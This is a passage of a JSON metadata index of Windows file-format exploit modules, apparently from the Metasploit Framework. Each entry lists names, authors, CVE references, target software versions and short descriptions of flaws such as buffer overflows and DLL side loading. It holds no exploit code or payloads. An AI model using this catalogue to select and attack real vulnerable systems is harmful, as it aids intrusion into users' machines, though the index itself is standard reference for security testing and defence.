"description": "Multiple DLL side loading vulnerabilities were found in various COM components.\n These issues can be exploited by loading these components as embedded\n OLE objects. When instantiating a vulnerable object, Windows will try to load one\n or more DLLs from the current working directory. If an attacker convinces the\n victim to open a specially crafted (Office) document from a directory also\n containing the attacker's DLL file, it is possible to execute arbitrary code with\n the privileges of the target user. This can potentially result in the attacker\n taking complete control of the affected system.",
"references": [
"CVE-2015-6132",
"CVE-2015-6128",
"CVE-2015-6133",
"CVE-2016-0041",
"CVE-2016-0100",
"CVE-2016-3235",
"MSB-MS15-132",
"MSB-MS16-014",
"MSB-MS16-025",
"MSB-MS16-041",
"MSB-MS16-070",
"URL-https://securify.nl/advisory/SFY20150801/com__services_dll_side_loading_vulnerability.html",
"URL-https://securify.nl/advisory/SFY20150805/event_viewer_snapin_multiple_dll_side_loading_vulnerabilities.html",
"URL-https://securify.nl/advisory/SFY20150803/windows_authentication_ui_dll_side_loading_vulnerability.html",
"URL-https://securify.nl/advisory/SFY20151102/shutdown_ux_dll_side_loading_vulnerability.html",
"URL-https://securify.nl/advisory/SFY20150802/shockwave_flash_object_dll_side_loading_vulnerability.html",
"URL-https://securify.nl/advisory/SFY20150806/ole_db_provider_for_oracle_multiple_dll_side_loading_vulnerabilities.html",
"URL-https://securify.nl/advisory/SFY20150905/nps_datastore_server_dll_side_loading_vulnerability.html",
"URL-https://securify.nl/advisory/SFY20150906/bda_mpeg2_transport_information_filter_dll_side_loading_vulnerability.html",
"URL-https://securify.nl/advisory/SFY20151101/mapsupdatetask_task_dll_side_loading_vulnerability.html",
"URL-https://securify.nl/advisory/SFY20150904/windows_mail_find_people_dll_side_loading_vulnerability.html",
"URL-https://securify.nl/advisory/SFY20150804/microsoft_visio_multiple_dll_side_loading_vulnerabilities.html"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"All",
"COM+ Services / Windows Vista - 10 / Office 2007 - 2016 (MS15-132)",
"Shockwave Flash Object / Windows 10 / Office 2013 (APSB15-28)",
"Windows Authentication UI / Windows 10 / Office 2013 - 2016 (MS15-132)",
"Shutdown UX / Windows 10 / Office 2016 (MS15-132)",
"MapUpdateTask Tasks / Windows 10 / Office 2016 (MS16-014)",
"Microsoft Visio 2010 / Windows 7 (MS16-070)",
"Event Viewer Snapin / Windows Vista - 7 / Office 2007 - 2013 (MS15-132)",
"OLE DB Provider for Oracle / Windows Vista - 7 / Office 2007 - 2013 (MS16-014)",
"Windows Mail Find People / Windows Vista / Office 2010 (MS16-025)",
"NPS Datastore server / Windows Vista / Office 2010 (MS16-014)",
"BDA MPEG2 Transport Information Filter / Windows Vista / Office 2010 (MS16-014)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/office_ole_multiple_dll_hijack.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/office_ole_multiple_dll_hijack",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/office_word_hta": {
"name": "Microsoft Office Word Malicious Hta Execution",
"full_name": "exploit/windows/fileformat/office_word_hta",
"rank": 600,
"disclosure_date": "2017-04-14",
"type": "exploit",
"author": [
"Haifei Li",
"ryHanson",
"wdormann",
"DidierStevens",
"vysec",
"Nixawk",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module creates a malicious RTF file that when opened in\n vulnerable versions of Microsoft Word will lead to code execution.\n The flaw exists in how an OLELink object can make an HTTP(S) request\n and execute HTA code in the response.\n\n This bug was originally seen being exploited in the wild starting\n in Oct 2016. This module was created by reversing a public\n malware sample.",
"references": [
"CVE-2017-0199",
"URL-https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/",
"URL-https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html",
"URL-https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/",
"URL-https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html",
"URL-https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html",
"URL-https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf",
"URL-https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/",
"URL-https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100",
"URL-https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/",
"URL-https://www.microsoft.com/en-us/download/details.aspx?id=10725",
"URL-https://msdn.microsoft.com/en-us/library/dd942294.aspx",
"URL-https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf",
"URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft Office Word"
],
"mod_time": "2017-08-20 17:48:03 +0000",
"path": "/modules/exploits/windows/fileformat/office_word_hta.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/office_word_hta",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/openoffice_ole": {
"name": "OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow",
"full_name": "exploit/windows/fileformat/openoffice_ole",
"rank": 300,
"disclosure_date": "2008-04-17",
"type": "exploit",
"author": [
"Marsu <Marsupilamipowa@hotmail.fr>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in OpenOffice 2.3.1 and 2.3.0 on\n Microsoft Windows XP SP3.\n\n By supplying an OLE file with a malformed DocumentSummaryInformation stream, an\n attacker can gain control of the execution flow, which results in arbitrary code\n execution under the context of the user.",
"references": [
"CVE-2008-0320",
"OSVDB-44472",
"BID-28819",
"EDB-5584",
"URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=694"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"OpenOffice 2.3.1 / 2.3.0 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/openoffice_ole.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/openoffice_ole",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/orbit_download_failed_bof": {
"name": "Orbit Downloader URL Unicode Conversion Overflow",
"full_name": "exploit/windows/fileformat/orbit_download_failed_bof",
"rank": 300,
"disclosure_date": "2008-04-03",
"type": "exploit",
"author": [
"Diego Juarez",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in Orbit Downloader.\n The vulnerability is due to Orbit converting a URL ascii string to unicode\n in an insecure way with MultiByteToWideChar.\n The vulnerability is exploited with a specially crafted metalink file that\n should be opened with Orbit through the \"File->Add Metalink...\" option.",
"references": [
"BID-28541",
"OSVDB-44036",
"CVE-2008-1602",
"URL-http://www.coresecurity.com/content/orbit-downloader"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Orbit Downloader 6.4 on Windows XP SP3",
"Orbit Downloader 6.4 on Windows 7"
],
"mod_time": "2017-09-22 18:49:09 +0000",
"path": "/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/orbit_download_failed_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/orbital_viewer_orb": {
"name": "Orbital Viewer ORB File Parsing Buffer Overflow",
"full_name": "exploit/windows/fileformat/orbital_viewer_orb",
"rank": 500,
"disclosure_date": "2010-02-27",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in David Manthey's\n Orbital Viewer. When processing .ORB files, data is read from file into\n a fixed-size stack buffer using the fscanf function. Since no bounds\n checking is done, a buffer overflow can occur. Attackers can execute\n arbitrary code by convincing their victim to open an ORB file.",
"references": [
"BID-38436",
"OSVDB-62580",
"CVE-2010-0688",
"URL-http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-011-orbital-viewer-orb-buffer-overflow/",
"EDB-11581"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Orbital Viewer 1.04 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/orbital_viewer_orb.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/orbital_viewer_orb",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ovf_format_string": {
"name": "VMWare OVF Tools Format String Vulnerability",
"full_name": "exploit/windows/fileformat/ovf_format_string",
"rank": 300,
"disclosure_date": "2012-11-08",
"type": "exploit",
"author": [
"Jeremy Brown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for\n Windows. The vulnerability occurs when printing error messages while parsing a\n malformed OVF file. The module has been tested successfully with VMWare OVF Tools\n 2.1 on Windows XP SP3.",
"references": [
"CVE-2012-3569",
"OSVDB-87117",
"BID-56468",
"URL-http://www.vmware.com/security/advisories/VMSA-2012-0015.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VMWare OVF Tools 2.1 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ovf_format_string.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ovf_format_string",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/proshow_cellimage_bof": {
"name": "ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/proshow_cellimage_bof",
"rank": 500,
"disclosure_date": "2009-08-20",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in ProShow Gold v4.0.2549.\n An attacker must send the file to the victim, and the victim must open the file.",
"references": [
"CVE-2009-3214",
"OSVDB-57226",
"EDB-9483",
"EDB-9519"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/proshow_cellimage_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/proshow_load_bof": {
"name": "Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow",
"full_name": "exploit/windows/fileformat/proshow_load_bof",
"rank": 300,
"disclosure_date": "2012-06-06",
"type": "exploit",
"author": [
"Julien Ahrens",
"mr.pr0n",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in Photodex ProShow Producer\n v5.0.3256 in the handling of the plugins load list file. An attacker must send the\n crafted \"load\" file to the victim, who must store it in the installation directory. The\n vulnerability will be triggered the next time ProShow is opened. The module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.",
"references": [
"OSVDB-83745",
"EDB-19563",
"EDB-20036",
"URL-http://security.inshell.net/advisory/30"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Photodex ProShow Producer 5.0.3256 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/proshow_load_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/proshow_load_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/publishit_pui": {
"name": "Publish-It PUI Buffer Overflow (SEH)",
"full_name": "exploit/windows/fileformat/publishit_pui",
"rank": 300,
"disclosure_date": "2014-02-05",
"type": "exploit",
"author": [
"Daniel Kazimirow",
"Andrew Smith \"jakx_\""
],
"description": "This module exploits a stack based buffer overflow in Publish-It when\n processing a specially crafted .PUI file. This vulnerability could be\n exploited by a remote attacker to execute arbitrary code on the target\n machine by enticing a user of Publish-It to open a malicious .PUI file.",
"references": [
"OSVDB-102911",
"CVE-2014-0980",
"EDB-31461"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Publish-It 3.6d"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/publishit_pui.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/publishit_pui",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/real_networks_netzip_bof": {
"name": "Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability",
"full_name": "exploit/windows/fileformat/real_networks_netzip_bof",
"rank": 400,
"disclosure_date": "2011-01-30",
"type": "exploit",
"author": [
"C4SS!0 G0M3S",
"TecR0c <roccogiovannicalvi@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n version 7.5.1 86 of Real Networks Netzip Classic.\n In order for the command to be executed, an attacker must convince someone to\n load a specially crafted zip file with NetZip Classic.\n By doing so, an attacker can execute arbitrary code as the victim user.",
"references": [
"OSVDB-83436",
"EDB-16083",
"BID-46059",
"URL-http://proforma.real.com"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3",
"Windows 7/Windows Vista"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/real_networks_netzip_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/real_player_url_property_bof": {
"name": "RealPlayer RealMedia File Handling Buffer Overflow",
"full_name": "exploit/windows/fileformat/real_player_url_property_bof",
"rank": 300,
"disclosure_date": "2012-12-14",
"type": "exploit",
"author": [
"suto <suto@vnsecurity.net>"
],
"description": "This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14.\n The vulnerability exists in the handling of real media files, due to the insecure\n usage of the GetPrivateProfileString function to retrieve the URL property from an\n InternetShortcut section.\n\n This module generates a malicious rm file which must be opened with RealPlayer via\n drag and drop or double click methods. It has been tested successfully on Windows\n XP SP3 with RealPlayer 15.0.5.109.",
"references": [
"CVE-2012-5691",
"OSVDB-88486",
"BID-56956",
"URL-http://service.real.com/realplayer/security/12142012_player/en/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 / Real Player 15.0.5.109"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/real_player_url_property_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/real_player_url_property_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/realplayer_ver_attribute_bof": {
"name": "RealNetworks RealPlayer Version Attribute Buffer Overflow",
"full_name": "exploit/windows/fileformat/realplayer_ver_attribute_bof",
"rank": 300,
"disclosure_date": "2013-12-20",
"type": "exploit",
"author": [
"Gabor Seljan"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by\n improper bounds checking of the version and encoding attributes inside\n the XML declaration.\n\n By persuading the victim to open a specially-crafted .RMP file, a\n remote attacker could execute arbitrary code on the system or cause\n the application to crash.",
"references": [
"BID-64695",
"EDB-30468",
"OSVDB-101356",
"CVE-2013-7260",
"US-CERT-VU-698278",
"URL-http://service.real.com/realplayer/security/12202013_player/en/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2/SP3 (DEP Bypass) / RealPlayer 16.0.3.51/16.0.2.32"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/realplayer_ver_attribute_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/safenet_softremote_groupname": {
"name": "SafeNet SoftRemote GROUPNAME Buffer Overflow",
"full_name": "exploit/windows/fileformat/safenet_softremote_groupname",
"rank": 400,
"disclosure_date": "2009-10-30",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in SafeNet SoftRemote\n Security Policy Editor <= 10.8.5. When an attacker\n creates a specially formatted security policy with an\n overly long GROUPNAME argument, it is possible to execute\n arbitrary code.",
"references": [
"CVE-2009-3861",
"OSVDB-59660",
"URL-http://www.senseofsecurity.com.au/advisories/SOS-09-008"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 English",
"WinSrv 2000 SP4 English",
"WinSrv 2000 SP2 English",
"WinSrv 2003 Enterprise Edition SP1 (v1023) English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/safenet_softremote_groupname",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/sascam_get": {
"name": "SasCam Webcam Server v.2.6.5 Get() Method Buffer Overflow",
"full_name": "exploit/windows/fileformat/sascam_get",
"rank": 100,
"disclosure_date": "2008-12-29",
"type": "exploit",
"author": [
"dean <dean@zerodaysolutions.com>"
],
"description": "The SasCam Webcam Server ActiveX control is vulnerable to a buffer overflow.\n By passing an overly long argument via the Get method, a remote attacker could\n overflow a buffer and execute arbitrary code on the system with the privileges\n of the user. This control is not marked safe for scripting, please choose your\n attack vector carefully.",
"references": [
"CVE-2008-6898",
"OSVDB-55945",
"BID-33053"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 / IE 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/sascam_get.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/sascam_get",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/scadaphone_zip": {
"name": "ScadaTEC ScadaPhone Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/scadaphone_zip",
"rank": 400,
"disclosure_date": "2011-09-12",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n version 5.3.11.1230 of scadaTEC's ScadaPhone.\n\n In order for the command to be executed, an attacker must convince someone to\n load a specially crafted project zip file with ScadaPhone.\n By doing so, an attacker can execute arbitrary code as the victim user.",
"references": [
"CVE-2011-4535",
"OSVDB-75375",
"URL-http://www.scadatec.com/",
"EDB-17817"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/scadaphone_zip.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/scadaphone_zip",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/shadow_stream_recorder_bof": {
"name": "Shadow Stream Recorder 3.0.1.7 Buffer Overflow",
"full_name": "exploit/windows/fileformat/shadow_stream_recorder_bof",
"rank": 300,
"disclosure_date": "2010-03-29",
"type": "exploit",
"author": [
"AlpHaNiX <alpha@hacker.bz>",
"b0telh0 <me@gotgeek.com.br>"
],
"description": "This module exploits a buffer overflow in Shadow Stream Recorder 3.0.1.7.\n Using the application to open a specially crafted asx file, a buffer\n overflow may occur to allow arbitrary code execution under the context\n of the user.",
"references": [
"CVE-2009-1641",
"OSVDB-81487",
"EDB-11957",
"BID-34864"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/shadow_stream_recorder_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/shaper_pdf_bof": {
"name": "PDF Shaper Buffer Overflow",
"full_name": "exploit/windows/fileformat/shaper_pdf_bof",
"rank": 300,
"disclosure_date": "2015-10-03",
"type": "exploit",
"author": [
"metacom27 <metacom27@gmail.com - twitter.com/m3tac0m>",
"metacom"
],
"description": "PDF Shaper is prone to a security vulnerability when processing PDF files.\n The vulnerability appears when using Convert PDF to Image with a specially\n crafted PDF file. This module has been tested successfully on Win XP, Win 7,\n Win 8, Win 10.",
"references": [
"EDB-37760"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"<Win Xp, Win 7, Win 8, Win 10 / PDF Shaper v.3.5 and v.3.6>"
],
"mod_time": "2018-08-26 04:18:38 +0000",
"path": "/modules/exploits/windows/fileformat/shaper_pdf_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/shaper_pdf_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/somplplayer_m3u": {
"name": "S.O.M.P.L 1.0 Player Buffer Overflow",
"full_name": "exploit/windows/fileformat/somplplayer_m3u",
"rank": 500,
"disclosure_date": "2010-01-22",
"type": "exploit",
"author": [
"Rick2600",
"dookie"
],
"description": "This module exploits a buffer overflow in Simple Open Music Player v1.0. When\n the application is used to import a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.",
"references": [
"OSVDB-64368",
"EDB-11219"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/somplplayer_m3u.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/somplplayer_m3u",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/subtitle_processor_m3u_bof": {
"name": "Subtitle Processor 7.7.1 .M3U SEH Unicode Buffer Overflow",
"full_name": "exploit/windows/fileformat/subtitle_processor_m3u_bof",
"rank": 300,
"disclosure_date": "2011-04-26",
"type": "exploit",
"author": [
"Brandon Murphy",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Subtitle Processor 7. By\n supplying a long string of data as a .m3u file, Subtitle Processor first converts\n this input to Unicode, which expands the string size, and then attempts to copy it\n inline on the stack. This results in a buffer overflow with SEH overwritten, allowing\n arbitrary code execution.",
"references": [
"OSVDB-72050",
"EDB-17217",
"URL-http://sourceforge.net/projects/subtitleproc/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/subtitle_processor_m3u_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/syncbreeze_xml": {
"name": "Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow",
"full_name": "exploit/windows/fileformat/syncbreeze_xml",
"rank": 300,
"disclosure_date": "2017-03-29",
"type": "exploit",
"author": [
"Daniel Teixeira"
],
"description": "This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16\n by using the import command option to import a specially crafted xml file.",
"references": [
"CVE-2017-7310",
"EDB-41773"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2018-01-23 16:34:49 +0000",
"path": "/modules/exploits/windows/fileformat/syncbreeze_xml.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/syncbreeze_xml",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/tfm_mmplayer_m3u_ppl_bof": {
"name": "TFM MMPlayer (m3u/ppl File) Buffer Overflow",
"full_name": "exploit/windows/fileformat/tfm_mmplayer_m3u_ppl_bof",
"rank": 400,
"disclosure_date": "2012-03-23",
"type": "exploit",
"author": [
"RjRjh Hack3r",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a buffer overflow in MMPlayer 2.2.\n The vulnerability is triggered when opening a malformed M3U/PPL file\n that contains an overly long string, which results in overwriting a\n SEH record, thus allowing arbitrary code execution under the context\n of the user.",
"references": [
"CVE-2009-2566",
"OSVDB-80532",
"BID-52698",
"EDB-18656",
"EDB-18657"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/tfm_mmplayer_m3u_ppl_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/total_video_player_ini_bof": {
"name": "Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",
"full_name": "exploit/windows/fileformat/total_video_player_ini_bof",
"rank": 300,
"disclosure_date": "2013-11-24",
"type": "exploit",
"author": [
"Mike Czumak",
"Fr330wn4g3 <Fr330wn4g3@gmail.com>"
],
"description": "This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability\n occurs when opening a malformed Settings.ini file, e.g. \"C:\\Program Files\\Total Video Player\\\".\n This module has been tested successfully on Windows WinXp-Sp3-EN, Windows 7, and Windows 8.",
"references": [
"OSVDB-100619",
"EDB-29799"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/total_video_player_ini_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/tugzip": {
"name": "TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability",
"full_name": "exploit/windows/fileformat/tugzip",
"rank": 400,
"disclosure_date": "2008-10-28",
"type": "exploit",
"author": [
"Stefan Marin",
"Lincoln",
"TecR0c <roccogiovannicalvi@gmail.com>",
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability\n in the latest version 3.5 of TugZip archiving utility.\n In order to trigger the vulnerability, an attacker must convince someone\n to load a specially crafted zip file with TugZip by double click or file open.\n By doing so, an attacker can execute arbitrary code as the victim user.",
"references": [
"OSVDB-49371",
"CVE-2008-4779",
"BID-31913",
"EDB-12008"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/tugzip.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/tugzip",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ultraiso_ccd": {
"name": "UltraISO CCD File Parsing Buffer Overflow",
"full_name": "exploit/windows/fileformat/ultraiso_ccd",
"rank": 500,
"disclosure_date": "2009-04-03",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in EZB Systems, Inc's\n UltraISO. When processing .CCD files, data is read from file into a\n fixed-size stack buffer. Since no bounds checking is done, a buffer overflow\n can occur. Attackers can execute arbitrary code by convincing their victim\n to open a CCD file.\n\n NOTE: A file with the same base name, but the extension of \"img\" must also\n exist. Opening either file will trigger the vulnerability, but the files must\n both exist.",
"references": [
"CVE-2009-1260",
"OSVDB-53275",
"BID-34363",
"BID-38613",
"EDB-8343"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal - Double-Click/Command Line Open Method",
"Windows Universal - File->Open + Toolbar Open Methods"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ultraiso_ccd.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ultraiso_ccd",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ultraiso_cue": {
"name": "UltraISO CUE File Parsing Buffer Overflow",
"full_name": "exploit/windows/fileformat/ultraiso_cue",
"rank": 500,
"disclosure_date": "2007-05-24",
"type": "exploit",
"author": [
"n00b",
"jduck <jduck@metasploit.com>"
],
